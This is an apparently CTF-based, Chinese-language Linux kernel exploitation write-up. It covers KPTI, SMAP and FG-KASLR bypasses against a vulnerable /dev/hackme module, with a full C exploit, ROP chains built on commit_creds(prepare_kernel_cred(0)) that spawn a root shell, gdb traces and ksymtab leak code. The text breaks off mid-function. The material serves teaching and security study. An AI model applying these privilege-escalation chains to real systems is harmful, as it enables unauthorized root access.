unsigned long mov_rax_cr3_pop1_ret = 0xffffffff8146d494; // mov rax, cr3; pop rbp; ret;
unsigned long pop_rdx_ret = 0xffffffff81007616; // pop rdx; ret;
unsigned long or_rax_rdx_ret = 0xffffffff8142192a; // or rax, rdx; ret;
unsigned long mov_cr3_rax_pop1_ret = 0xffffffff81477e47; // mov cr3, rax; pop rbp; ret;

void overflow(void){
unsigned n = 50;
unsigned long payload[n];
unsigned off = 16;
payload[off++] = cookie;
payload[off++] = 0x0; // rbx
payload[off++] = 0x0; // r12
payload[off++] = 0x0; // rbp

// commit_creds(prepare_kernel_cred(0))
...

// change cr3 to user page table
payload[off++] = mov_rax_cr3_pop1_ret;
payload[off++] = 0;
payload[off++] = pop_rdx_ret;
payload[off++] = 0x1000;
payload[off++] = or_rax_rdx_ret;
payload[off++] = mov_cr3_rax_pop1_ret;
payload[off++] = 0;

// ret to user space
payload[off++] = swapgs_pop1_ret;
payload[off++] = 0;
payload[off++] = iretq;
payload[off++] = user_rip;
payload[off++] = user_cs;
payload[off++] = user_rflags;
payload[off++] = user_sp;
payload[off++] = user_ss;
...
}

在提权和返回用户态中间添加了修改CR3的ROP,但是,这样编译运行的话会直接导致内核崩溃:

这是一个double fault,意思是在exception的handle中发生exception。

通过调试,可以发现,是在修改了cr3寄存器之后发生的:

可以判断到原因:切换到用户态的页表后,此时的栈指针还是一个内核栈的指针,在随后的pop rbp指令中,需要访问栈,而用户态页表中没有这个内核栈的地址映射,此时就会发生缺页异常

所以这里我自己构造的ROP,由于没有解决内核栈寻址的问题,就会导致内核崩溃。

因此,可以使用内核中写好的切换用户态页表的代码来去做,内核自己写的代码当然考虑会周全些,这个内核函数就是**swapgs_restore_regs_and_return_to_usermode**:

1
2
/ $ cat ./kallsyms | grep swapgs_restore_regs_and_return_to_usermode
ffffffff81200f10 T swapgs_restore_regs_and_return_to_usermode

此函数的汇编代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
(gdb) x/10i 0xffffffff81200f10
0xffffffff81200f10 <_stext+2101008>: pop %r15
0xffffffff81200f12 <_stext+2101010>: pop %r14
0xffffffff81200f14 <_stext+2101012>: pop %r13
0xffffffff81200f16 <_stext+2101014>: pop %r12
0xffffffff81200f18 <_stext+2101016>: pop %rbp
0xffffffff81200f19 <_stext+2101017>: pop %rbx
0xffffffff81200f1a <_stext+2101018>: pop %r11
0xffffffff81200f1c <_stext+2101020>: pop %r10
0xffffffff81200f1e <_stext+2101022>: pop %r9
0xffffffff81200f20 <_stext+2101024>: pop %r8
(gdb)
0xffffffff81200f22 <_stext+2101026>: pop %rax
0xffffffff81200f23 <_stext+2101027>: pop %rcx
0xffffffff81200f24 <_stext+2101028>: pop %rdx
0xffffffff81200f25 <_stext+2101029>: pop %rsi
0xffffffff81200f26 <_stext+2101030>: mov %rsp,%rdi ; 保存旧栈
0xffffffff81200f29 <_stext+2101033>: mov %gs:0x6004,%rsp ; 更换栈
0xffffffff81200f32 <_stext+2101042>: pushq 0x30(%rdi) ; 把旧栈中的值压到新栈
0xffffffff81200f35 <_stext+2101045>: pushq 0x28(%rdi)
0xffffffff81200f38 <_stext+2101048>: pushq 0x20(%rdi)
0xffffffff81200f3b <_stext+2101051>: pushq 0x18(%rdi)
(gdb)
0xffffffff81200f3e <_stext+2101054>: pushq 0x10(%rdi)
0xffffffff81200f41 <_stext+2101057>: pushq (%rdi)
0xffffffff81200f43 <_stext+2101059>: push %rax
0xffffffff81200f44 <_stext+2101060>: xchg %ax,%ax
0xffffffff81200f46 <_stext+2101062>: mov %cr3,%rdi
0xffffffff81200f49 <_stext+2101065>: jmp 0xffffffff81200f7f <_stext+2101119>
...
(gdb) x/10i 0xffffffff81200f7f
0xffffffff81200f7f <_stext+2101119>: or $0x1000,%rdi
0xffffffff81200f86 <_stext+2101126>: mov %rdi,%cr3
0xffffffff81200f89 <_stext+2101129>: pop %rax
0xffffffff81200f8a <_stext+2101130>: pop %rdi
0xffffffff81200f8b <_stext+2101131>: swapgs
0xffffffff81200f8e <_stext+2101134>: nopl (%rax)
0xffffffff81200f91 <_stext+2101137>: jmpq 0xffffffff81200fc0 <_stext+2101184>
...
(gdb) x/10i 0xffffffff81200fc0
0xffffffff81200fc0 <_stext+2101184>: testb $0x4,0x20(%rsp)
0xffffffff81200fc5 <_stext+2101189>: jne 0xffffffff81200fc9 <_stext+2101193>
0xffffffff81200fc7 <_stext+2101191>: iretq


可以看到,在修改cr3寄存器之前,执行了一条 mov %gs:0x6004, %rsp指令来进行栈的切换,我猜测gs:0x6004处的值在用户态页表中也有映射,防止切换用户态页表后栈寻址失败的问题。并且通过rdi寄存器,将原本栈顶的若干个值都push到了新栈中。

可以看到这个函数开头有一大堆的pop,为了减少payload长度,ROP可以从这个函数的第一条mov指令0xffffffff81200f26开始执行。根据此函数的汇编代码,可以确认旧栈顶开始的第3至第7个值,会保存到新栈中并作为最后iretq时的栈布局,因此可以构造好rop的payload:

1
2
3
4
5
6
7
8
9
// switch user space cr3 and swapgs and iretq
payload[off++] = 0xffffffff81200f26; // swapgs_restore_regs_and_return_to_usermode
payload[off++] = 0;
payload[off++] = 0;
payload[off++] = user_rip;
payload[off++] = user_cs;
payload[off++] = user_rflags;
payload[off++] = user_sp;
payload[off++] = user_ss;

成功着陆用户态get root shell:

完整exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
// gcc ret2usr.c -fPIE -static -o ret2usr

#define _GNU_SOURCE
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sched.h>
#include <sys/mman.h>
#include <signal.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <linux/userfaultfd.h>
#include <sys/wait.h>
#include <poll.h>
#include <unistd.h>
#include <stdlib.h>


int global_fd;

// 打开 /dev/hackme 设备
void open_dev(){
global_fd = open("/dev/hackme", O_RDWR);
if (global_fd < 0){
puts("[!] Failed to open device");
exit(-1);
} else {
puts("[*] Opened device");
}
}

unsigned long user_cs, user_ss, user_rflags, user_sp;

// 将后面iretq时需要恢复的寄存器保存到本地变量中
void save_state(){
__asm__(
".intel_syntax noprefix;"
"mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
".att_syntax;"
);
puts("[*] Saved state");
}

void print_leak(unsigned long *leak, unsigned n) {
for (unsigned i = 0; i < n; ++i) {
printf("%u: %lx\n", i, leak[i]);
}
}

unsigned long cookie;

void leak(void){
unsigned n = 20;
unsigned long leak[n];
ssize_t r = read(global_fd, leak, sizeof(leak));
cookie = leak[16]; // cookie与tmp偏移0x80

printf("[*] Leaked %zd bytes\n", r);
//print_leak(leak, n);
printf("[*] Cookie: %lx\n", cookie);
}

// 判断当前用户id后运行system("/bin/sh")
void get_shell(void){
puts("[*] Returned to userland");
if (getuid() == 0){
printf("[*] UID: %d, got root!\n", getuid());
system("/bin/sh");
} else {
printf("[!] UID: %d, didn't get root\n", getuid());
exit(-1);
}
}

unsigned long user_rip = (unsigned long)get_shell; // 返回用户态后起shell

unsigned long pop_rdi_ret = 0xffffffff81006370; // pop rdi; ret;
unsigned long native_write_cr4 = 0xffffffff814443e0; // 新版本不能关闭smep smap
unsigned long prepare_kernel_cred = 0xffffffff814c67f0;
unsigned long commit_creds = 0xffffffff814c6410;
unsigned long mov_rdi_rax = 0xffffffff816bf203; // mov rdi, rax; mov qword ptr [rsi + 0x140], rdi; pop rbp; ret;

void overflow(void){
unsigned n = 50;
unsigned long payload[n];
unsigned off = 16;
payload[off++] = cookie;
payload[off++] = 0x0; // rbx
payload[off++] = 0x0; // r12
payload[off++] = 0x0; // rbp

// commit_creds(prepare_kernel_cred(0))
payload[off++] = pop_rdi_ret; // return address
payload[off++] = 0;
payload[off++] = prepare_kernel_cred;
payload[off++] = mov_rdi_rax; // mov rdi, rax; mov qword ptr [rsi + 0x140], rdi; pop rbp; ret;
payload[off++] = 0;
payload[off++] = commit_creds;

// switch user space cr3 and swapgs and iretq
payload[off++] = 0xffffffff81200f26; // swapgs_restore_regs_and_return_to_usermode
payload[off++] = 0;
payload[off++] = 0;
payload[off++] = user_rip;
payload[off++] = user_cs;
payload[off++] = user_rflags;
payload[off++] = user_sp;
payload[off++] = user_ss;

puts("[*] Prepared payload");
ssize_t w = write(global_fd, payload, sizeof(payload));

puts("[!] Should never be reached");
}

int main() {

save_state();

open_dev();

leak();

overflow();

puts("[!] Should never be reached");

return 0;
}

/*
0xffffffff81200f26 <_stext+2101030>: mov %rsp,%rdi ; 保存旧栈
0xffffffff81200f29 <_stext+2101033>: mov %gs:0x6004,%rsp ; 更换栈
0xffffffff81200f32 <_stext+2101042>: pushq 0x30(%rdi) ; 把旧栈中的值压到新栈
0xffffffff81200f35 <_stext+2101045>: pushq 0x28(%rdi)
0xffffffff81200f38 <_stext+2101048>: pushq 0x20(%rdi)
0xffffffff81200f3b <_stext+2101051>: pushq 0x18(%rdi)
(gdb)
0xffffffff81200f3e <_stext+2101054>: pushq 0x10(%rdi)
0xffffffff81200f41 <_stext+2101057>: pushq (%rdi)
0xffffffff81200f43 <_stext+2101059>: push %rax
0xffffffff81200f44 <_stext+2101060>: xchg %ax,%ax
0xffffffff81200f46 <_stext+2101062>: mov %cr3,%rdi
0xffffffff81200f49 <_stext+2101065>: jmp 0xffffffff81200f7f <_stext+2101119>
...
(gdb) x/10i 0xffffffff81200f7f
0xffffffff81200f7f <_stext+2101119>: or $0x1000,%rdi
0xffffffff81200f86 <_stext+2101126>: mov %rdi,%cr3
0xffffffff81200f89 <_stext+2101129>: pop %rax
0xffffffff81200f8a <_stext+2101130>: pop %rdi
0xffffffff81200f8b <_stext+2101131>: swapgs
0xffffffff81200f8e <_stext+2101134>: nopl (%rax)
0xffffffff81200f91 <_stext+2101137>: jmpq 0xffffffff81200fc0 <_stext+2101184>
...
(gdb) x/10i 0xffffffff81200fc0
0xffffffff81200fc0 <_stext+2101184>: testb $0x4,0x20(%rsp)
0xffffffff81200fc5 <_stext+2101189>: jne 0xffffffff81200fc9 <_stext+2101193>
0xffffffff81200fc7 <_stext+2101191>: iretq

*/

3.3 Signal Handler

https://trungnguyen1909.github.io/blog/post/matesctf/KSMASH/
https://github.com/TrungNguyen1909/writeups/blob/master/matesctf/KSMASH/exploit.c

从参考文章里看到的一种方法,在exp中将get_shell的函数注册为SIGSEGV信号处理函数,然后当直接返回用户态导致segmentation fault时,就会去执行对应的signal handler即get_shell函数。

完整exp如下,相较2.2节的EXP仅仅添加了一行signal(SIGSEGV,get_shell)。最后可以成功执行get_shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
...

// 判断当前用户id后运行system("/bin/sh")
void get_shell(int not_used){
puts("[*] Catch fault");
if (getuid() == 0){
printf("[*] UID: %d, got root!\n", getuid());
system("/bin/sh");
exit(0);
} else {
printf("[!] UID: %d, didn't get root\n", getuid());
exit(-1);
}
}

void overflow(void){
unsigned n = 50;
unsigned long payload[n];
unsigned off = 16;
payload[off++] = cookie;
payload[off++] = 0x0; // rbx
payload[off++] = 0x0; // r12
payload[off++] = 0x0; // rbp

// commit_creds(prepare_kernel_cred(0))
...

// ret to user space
payload[off++] = 0xffffffff8100a55f; // swapgs; pop rbp; ret;
payload[off++] = 0;
payload[off++] = 0xffffffff814381cb; // iretq;
payload[off++] = get_shell; // rip
payload[off++] = user_cs;
payload[off++] = user_rflags;
payload[off++] = user_sp;
payload[off++] = user_ss;

puts("[*] Prepared payload");
ssize_t w = write(global_fd, payload, sizeof(payload));

puts("[!] Should never be reached");
}

int main() {
signal(SIGSEGV,get_shell);

save_state();

open_dev();

leak();

overflow();

puts("[!] Should never be reached");

return 0;
}

这里其实有一个问题网上没找到答案:get_shell()函数也是在用户态的,按理说内核页表中用户态的页应该都是Non-Executable的才对,为什么添加了signal(SIGSEGV, get_shell)后get_shell()函数可以正常执行?

调试EXP后可以搞清楚这个问题。

可以看到,iretq返回用户态的get_shell()函数后,执行第一条指令时就触发了一个异常,进入了内核的异常处理,cr2寄存器中存着发生异常的get_shell函数的地址,此时可以看到,cr3寄存器中的页表地址,第12bit为0,是内核页表。

在get_shell函数下断点,继续往下运行,断下来时再查看,就会发现cr3寄存器中的页表地址已经变成了用户态页表,此时可以正常运行get_shell()函数了:

因此可以得出结论,第一次返回用户态时,由于此时的页表没有切换回用户态页表,因此触发了异常,进入到内核的异常处理后,由于先前注册过了用户态的signal handler,因此内核经过一系列的中断处理程序索引后最终会iretq返回用户态指定的signal handler,而内核在返回用户态时,进行了页表切换,因此用户态的signal handler可以正常运行。

Level4 SMAP

SMAP,即Supervisor Mode Access Prevention(SMAP)特权模式访问保护,用于补充SMEP,当进程处于内核态时,不能访问用户态地址空间的页。SMAP由CR4寄存器的21st bit来控制。Control Register来启用的CR4。在启动时,它可以通过添加+smap到启用-cpu,并通过添加nosmap到禁用-append。QEMU启动脚本中,在-cpu中添加+smap可以开启,在-append中添加nosmap可以将其关闭。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
#!/bin/sh
qemu-system-x86_64 \
-m 128M \
-cpu kvm64,+smep,+smap \
-kernel vmlinuz \
-initrd initramfs.cpio.gz \
-hdb flag.txt \
-snapshot \
-nographic \
-monitor /dev/null \
-no-reboot \
-append "kpti=1 nokaslr console=ttyS0 quiet panic=1" \
-s

开启SMAP后,再去运行2.3中栈迁移的EXP,就会出现double fault错误,内核崩溃退出。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
/ $ ./smep3
[*] Saved state
[*] Opened device
[*] Leaked 160 bytes
[*] Cookie: d928c8f2e47a5f00
[*] Prepared payload
[ 36.341448] traps: PANIC: double fault, error_code: 0x0
[ 36.341741] double fault: 0000 [#1] SMP PTI
[ 36.341764] CPU: 0 PID: 115 Comm: smep3 Tainted: G O 5.9.0-rc6+ #10
[ 36.341778] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.13.0-1ubuntu1.1 04/01/2014
[ 36.341781] RIP: 0010:bit_update_start+0x3f/0x50
[ 36.341787] Code: fb 49 8d 74 24 38 e8 10 2a ff ff 8b 53 60 41 89 54 24 48 8b 53 64 41 89 54 24 4c 8b 93 d4 00 00 00 41 89 94 24 bc 00 00 00 5b <41> 5c 5d c3 00 00 00 00 00 00 00 00 00 00 0
[ 36.341839] RSP: 0018:000000005b000000 EFLAGS: 00000296
[ 36.342007] RAX: 0000000000000190 RBX: 0000000000000000 RCX: 0000000000000000
[ 36.342011] RDX: 0000000000000010 RSI: ffffffffc00025c0 RDI: ffffc900001bff88
[ 36.342014] RBP: 0000000000000000 R08: d928c8f2e47a5f00 R09: 00000000000000a0
[ 36.342017] R10: d928c8f2e47a5f00 R11: 00000000000000a0 R12: 0000000000000000
[ 36.342020] R13: ffffc900001bfef0 R14: 00007ffcb07b5fb0 R15: ffff88800688a300
[ 36.342023] FS: 0000000001373880(0000) GS:ffff888007800000(0000) knlGS:0000000000000000
[ 36.342026] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 36.342029] CR2: 000000005afffff8 CR3: 0000000006112000 CR4: 00000000003006f0
[ 36.342031] Call Trace:
[ 36.342033] Modules linked in: hackme(O)
[ 36.349527] ---[ end trace 479f1c29355f2449 ]---
[ 36.349532] RIP: 0010:bit_update_start+0x3f/0x50
[ 36.349558] Code: fb 49 8d 74 24 38 e8 10 2a ff ff 8b 53 60 41 89 54 24 48 8b 53 64 41 89 54 24 4c 8b 93 d4 00 00 00 41 89 94 24 bc 00 00 00 5b <41> 5c 5d c3 00 00 00 00 00 00 00 00 00 00 0
[ 36.349563] RSP: 0018:000000005b000000 EFLAGS: 00000296
[ 36.349570] RAX: 0000000000000190 RBX: 0000000000000000 RCX: 0000000000000000
[ 36.349573] RDX: 0000000000000010 RSI: ffffffffc00025c0 RDI: ffffc900001bff88
[ 36.349576] RBP: 0000000000000000 R08: d928c8f2e47a5f00 R09: 00000000000000a0
[ 36.349579] R10: d928c8f2e47a5f00 R11: 00000000000000a0 R12: 0000000000000000
[ 36.349581] R13: ffffc900001bfef0 R14: 00007ffcb07b5fb0 R15: ffff88800688a300
[ 36.349585] FS: 0000000001373880(0000) GS:ffff888007800000(0000) knlGS:0000000000000000
[ 36.349587] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 36.349590] CR2: 000000005afffff8 CR3: 0000000006112000 CR4: 00000000003006f0
[ 36.349593] Kernel panic - not syncing: Fatal exception in interrupt
[ 36.350173] Kernel Offset: disabled

这是由于2.3栈迁移的EXP中,将内核栈迁移到了用户态地址空间中,然后在ret到新栈上的地址时,访问了用户态地址,导致了double fault。

要绕过的话,就是像2.1节中,一般是通过内核的gadget去将其关闭,但是在高版本中,SMAP和SMEP的比特都被内核标记为pinned固定了,无法通过内核gadget去将其关闭。

Level5 KASLR

5.1 KASLR与FG-KASLR

KASLR,即内核地址空间布局随机化 Kernel address space layout randomization (KASLR)

参考Linux KASLR机制详解,linux kernel的layout:

上图中的vmlinux.relocs就是内核重定位表。内核重定位表用于对内核虚拟地址的重定位操作,我们知道内核的默认虚拟基地址是: 0xffffffff81000000(内核占用0xffffffff80000000~0xffffffffC0000000这1G虚拟地址空间),当我们在编译内核的时候,如果设置.config文件中的CONFIG_RANDOMIZE_BASE=y,那么在将compressed kernel解压到randomized physical address后,还要对kernel中的虚拟地址进行randomize,这时就要知道内核中哪些地方的虚拟地址需要relocate,内核重定位表就记录了内核中所有需要重定位的虚拟地址的位置。

普通的KASLR开启后,会将内核的装载地址随机化(包括物理地址和虚拟地址),这样的话,随机的是整一个段,而段内的各个内核符号偏移还是固定的。意思是只要知道了装载的基地址,其他的内核函数地址就可以通过固定偏移计算出来。以这道题为例,只要在栈上泄漏某个.text段的内核地址,然后通过固定的偏移就可以计算出内核.text段的基地址,从而计算出其他内核函数的地址,很轻易就能完成漏洞利用。

但是,这道题中使用的是特殊的随机化——FG-KASLRFunction Granular KASLR,它是基于函数的粒度去进行随机化的,也就是说,每次启动内核,会对每个函数的地址去进行虚拟化,而不仅仅是虚拟化.text段。

参考CTF WIKI - FGKASLR,FGKASLR利用了gcc的编译选项-ffunction-sections把内核中的不同函数放进不同的section中,而不是像以前一样放在默认的.text段里。在编译的过程中,任何使用 C 语言编写的函数以及不在特殊输入节的函数都会单独作为一个节;使用汇编编写的代码会位于一个统一的节中。

readelf -S vmlinux查看vmlinux的节区头,可以还行啦,这道题目的vmlinux有三万六千多个节区,内核函数都被单独放在了.text.[func_name]的节区中去了:

而一个没有开启FGKASLR的内核节区:

5.2 FG-KASLR的绕过

5.2.1 FGKASLR弱点

CTF WIKI FGKASLR中给出了一个名为layout_randomized_image的代码,内核启动时是在这个函数中计算要进行随机化的节区,添加到sections数组中。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
/*
* now we need to walk through the section headers and collect the
* sizes of the .text sections to be randomized.
*/
for (i = 0; i < shnum; i++) {
s = &sechdrs[i];
sname = secstrings + s->sh_name;

if (s->sh_type == SHT_SYMTAB) {
/* only one symtab per image */
if (symtab)
error("Unexpected duplicate symtab");

symtab = malloc(s->sh_size);
if (!symtab)
error("Failed to allocate space for symtab");

memcpy(symtab, output + s->sh_offset, s->sh_size);
num_syms = s->sh_size / sizeof(*symtab);
continue;
}

if (s->sh_type == SHT_STRTAB && i != ehdr->e_shstrndx) {
if (strtab)
error("Unexpected duplicate strtab");

strtab = malloc(s->sh_size);
if (!strtab)
error("Failed to allocate space for strtab");

memcpy(strtab, output + s->sh_offset, s->sh_size);
}

if (!strcmp(sname, ".text")) {
if (text)
error("Unexpected duplicate .text section");

text = s;
continue;
}

if (!strcmp(sname, ".data..percpu")) {
/* get start addr for later */
percpu = s;
continue;
}

if (!(s->sh_flags & SHF_ALLOC) ||
!(s->sh_flags & SHF_EXECINSTR) ||
!(strstarts(sname, ".text")))
continue;

sections[num_sections] = s;

num_sections++;
}
sections[num_sections] = NULL;
sections_size = num_sections;

根据代码中的条件判断语句,可以得出以下结论:

  • 类型为SHT_SYMTAB的段不参与FG随机化,也就是.symtab

  • 类型为SHT_STRTAB的段不参与FG随机化,也就是.strtab

  • .text段不参与随机化

    1
    [ 1] .text         PROGBITS        ffffffff81000000 200000 400dd7 00  AX  0   0 4096
  • .data..percpu段不参与FG随机化

  • 节区头的flag中,同时有SHF_ALLOCSHF_EXECINSTR,且以.text开头的节区才随机化

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    root@ubun2004:~/pwn/hxp2020/kernel-rop# readelf --section-headers -W vmlinux| grep -vE " .text|AX"
    There are 36140 section headers, starting at offset 0x25c1420:

    Section Headers:
    [Nr] Name Type Address Off Size ES Flg Lk Inf Al
    ...
    ...
    [36106] .rodata PROGBITS ffffffff81c00000 e00000 382241 00 WA 0 0 4096
    [36107] .pci_fixup PROGBITS ffffffff81f82250 1182250 002ed0 00 A 0 0 16
    [36108] .tracedata PROGBITS ffffffff81f85120 1185120 000078 00 A 0 0 1
    [36109] __ksymtab PROGBITS ffffffff81f85198 1185198 00b424 00 A 0 0 4
    [36110] __ksymtab_gpl PROGBITS ffffffff81f905bc 11905bc 00dab8 00 A 0 0 4
    [36111] __ksymtab_strings PROGBITS ffffffff81f9e074 119e074 027a82 01 AMS 0 0 1
    [36112] __init_rodata PROGBITS ffffffff81fc5b00 11c5b00 000230 00 A 0 0 32
    [36113] __param PROGBITS ffffffff81fc5d30 11c5d30 002990 00 A 0 0 8
    [36114] __modver PROGBITS ffffffff81fc86c0 11c86c0 000078 00 A 0 0 8
    [36115] __ex_table PROGBITS ffffffff81fc8740 11c8740 001c50 00 A 0 0 4
    [36116] .notes NOTE ffffffff81fca390 11ca390 0001ec 00 A 0 0 4
    [36117] .data PROGBITS ffffffff82000000 1200000 215d80 00 WA 0 0 8192
    [36118] __bug_table PROGBITS ffffffff82215d80 1415d80 01134c 00 WA 0 0 1
    [36119] .vvar PROGBITS ffffffff82228000 1428000 001000 00 WA 0 0 16
    [36120] .data..percpu PROGBITS 0000000000000000 1600000 02e000 00 WA 0 0 4096
    [36122] .rela.init.text RELA 0000000000000000 24d4410 000180 18 I 36137 36121 8
    [36124] .init.data PROGBITS ffffffff822b6000 16b6000 18d1a0 00 WA 0 0 8192
    [36125] .x86_cpu_dev.init PROGBITS ffffffff824431a0 18431a0 000028 00 A 0 0 8
    [36126] .parainstructions PROGBITS ffffffff824431c8 18431c8 01e04c 00 A 0 0 8
    [36127] .altinstructions PROGBITS ffffffff82461218 1861218 003a9a 00 A 0 0 1
    [36129] .iommu_table PROGBITS ffffffff82465bb0 1865bb0 0000a0 00 A 0 0 8
    [36130] .apicdrivers PROGBITS ffffffff82465c50 1865c50 000038 00 WA 0 0 8
    [36132] .smp_locks PROGBITS ffffffff82468000 1868000 007000 00 A 0 0 4
    [36133] .data_nosave PROGBITS ffffffff8246f000 186f000 001000 00 WA 0 0 4
    [36134] .bss NOBITS ffffffff82470000 1870000 590000 00 WA 0 0 4096
    [36135] .brk NOBITS ffffffff82a00000 1870000 02c000 00 WA 0 0 1
    [36136] .init.scratch PROGBITS ffffffff82c00000 2000000 400000 00 WA 0 0 32
    [36137] .symtab SYMTAB 0000000000000000 2400000 0d3a40 18 36138 36107 8
    [36138] .strtab STRTAB 0000000000000000 24d3a40 0000ce 00 0 0 1
    [36139] .shstrtab STRTAB 0000000000000000 24d4590 0ece8d 00 0 0 1
    Key to Flags:
    W (write), A (alloc), X (execute), M (merge), S (strings), I (info),
    L (link order), O (extra OS processing required), G (group), T (TLS),
    C (compressed), x (unknown), o (OS specific), E (exclude),
    l (large), p (processor specific)

需要注意的是,这里所说的“不参与随机化”并不是真的不随机化,但它们是与kernel base一起随机化,而不是每个节区单独随机化,因此,相对于kernel base,这些节是保持固定偏移的。因此,泄露了kernel base后就可以获得这些节区的地址。

5.2.2 泄露内核基地址

在hackme_read函数中下断点,观察栈上是否有.text段中的地址。可以先查看kallsyms文件,查看_text符号的地址,即内核(.text)基地址,再加上.text的段大小0x400dd7,就能知道.text段的范围了:

可以看到,.text的范围应是 0xxffffffffac000000 ~ 0xffffffffac400dd7

在hackme_read函数中调用copy_to_user的位置下断点,查看rsi寄存器就能看到泄露的内容了,在这里面查找.text范围内的值:

在偏移38处找到一个.text段的地址!这样内核基地址就有了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
unsigned long cookie;
unsigned long kernel_leak;
unsigned long kernel_base;

void leak_cookie_kernel(void){
unsigned n = 50;
unsigned long leak[n];
ssize_t r = read(global_fd, leak, sizeof(leak));
cookie = leak[16]; // cookie与tmp偏移0x80
kernel_leak = leak[38]; // kernel addr 与 tmp偏移0x130
kernel_base = kernel_leak - 0xa157;


printf("[*] Leaked %zd bytes\n", r);
//print_leak(leak, n);
printf("[*] Cookie: %lx\n", cookie);
printf("[*] Kernel Base: %lx\n", kernel_base);
}
1
2
3
4
5
6
7
8
/ $ ./exp_fgkaslr
[*] Saved state
[*] Opened device
[*] Leaked 400 bytes
[*] Cookie: cacb7526b9820f00
[*] Kernel Base: ffffffff89000000
/ $

5.2.3 内核符号表ksymtab

ksymtab是内核中的符号表,参考stackoverflow - what is __ksymtab? in linux kernel,在__ksymtab段中,而在kallsyms文件中,__start___ksymtab符号代表这个段的起始地址,而每个内核符号的条目,则以__ksymtab_<symbol_name>来命名:

正如5.2.1中所说,__ksymtab内核符号表这个段与kernel base的偏移是固定的,因此,泄露了内核基地址后,就可以根据固定的偏移来找到内核符号表中的每一个条目了。

条目的结构https://elixir.bootlin.com/linux/v5.9-rc6/source/include/linux/export.h#L60

1
2
3
4
5
6
struct kernel_symbol {
int value_offset;
int name_offset;
int namespace_offset;
};

里边的value_offset就是我们用来泄露符号地址的值了,它是符号地址与__ksymtab_<symbol_name>的偏移。以prepare_kernel_cred为例:

1
2
3
4
5
6
/ $ cat ./kallsyms | grep prepare_kernel_cred
ffffffff81614900 T prepare_kernel_cred
ffffffff8218d4fc r __ksymtab_prepare_kernel_cred
ffffffff821a09b2 r __kstrtab_prepare_kernel_cred
ffffffff821a4d42 r __kstrtabns_prepare_kernel_cred

gdb中验证:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
(gdb) x/3wx 0xffffffff8218d4fc
0xffffffff8218d4fc: 0xff487404 0x000134b2 0x0001783e
(gdb) x/10i 0xffffffff8218d4fc + (signed int)0xff487404
0xffffffff81614900: nopl 0x0(%rax,%rax,1)
0xffffffff81614905: push %rbp
0xffffffff81614906: mov $0xcc0,%esi
0xffffffff8161490b: mov %rsp,%rbp
0xffffffff8161490e: push %r12
0xffffffff81614910: mov %rdi,%r12
0xffffffff81614913: mov 0x10d1c36(%rip),%rdi # 0xffffffff826e6550
0xffffffff8161491a: push %rbx
0xffffffff8161491b: callq 0xffffffff816f93d0
0xffffffff81614920: test %rax,%rax
(gdb) x/s 0xffffffff8218d4fc + 4 + (signed int)0x000134b2
0xffffffff821a09b2: "prepare_kernel_cred"
(gdb)

5.2.4 泄露内核符号

现在能泄露内核基地址、内核符号表地址,剩下的就是在.text段里寻找合适的能够从符号表中读取内容的gadget了。用cat ./gadget.txt | grep 0xffffffff810 |grep "***"过滤一下指令的地址就可以了

1
2
3
0xffffffff81015a80: mov eax, dword ptr [rax]; pop rbp; ret;
0xffffffff81004d11: pop rax; ret;

通过ROP执行这两条gadget,就能读取内存到rax寄存器中了,即从内核符号表中读取内核函数的地址。泄露完地址后不太好直接进行ROP取调用,可以通过3.2节中使用的**swapgs_restore_regs_and_return_to_usermode**安全地切换回用户态页表、返回用户态中去,再进行后续的利用。

由于在**swapgs_restore_regs_and_return_to_usermode**的过程中,rax和rsi寄存器没有改变,所以我这里分别将ROP中读取到的两个内核函数的offset_value存到rsi、rax寄存器中,并将iretq返回时的rip指定为exp中的用户态函数calc_kernel_symbols,在calc_kernel_symbols函数的开头,通过内联汇编,将存在rsi、rax中的offset_value取出来。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
void calc_kernel_symbols(void);
unsigned long ksymtab_commit_creds;
unsigned long ksymtab_prepare_kernel_cred;
void leak_kernel_symbols(void){
ksymtab_commit_creds = kernel_base + 0xf87d90;
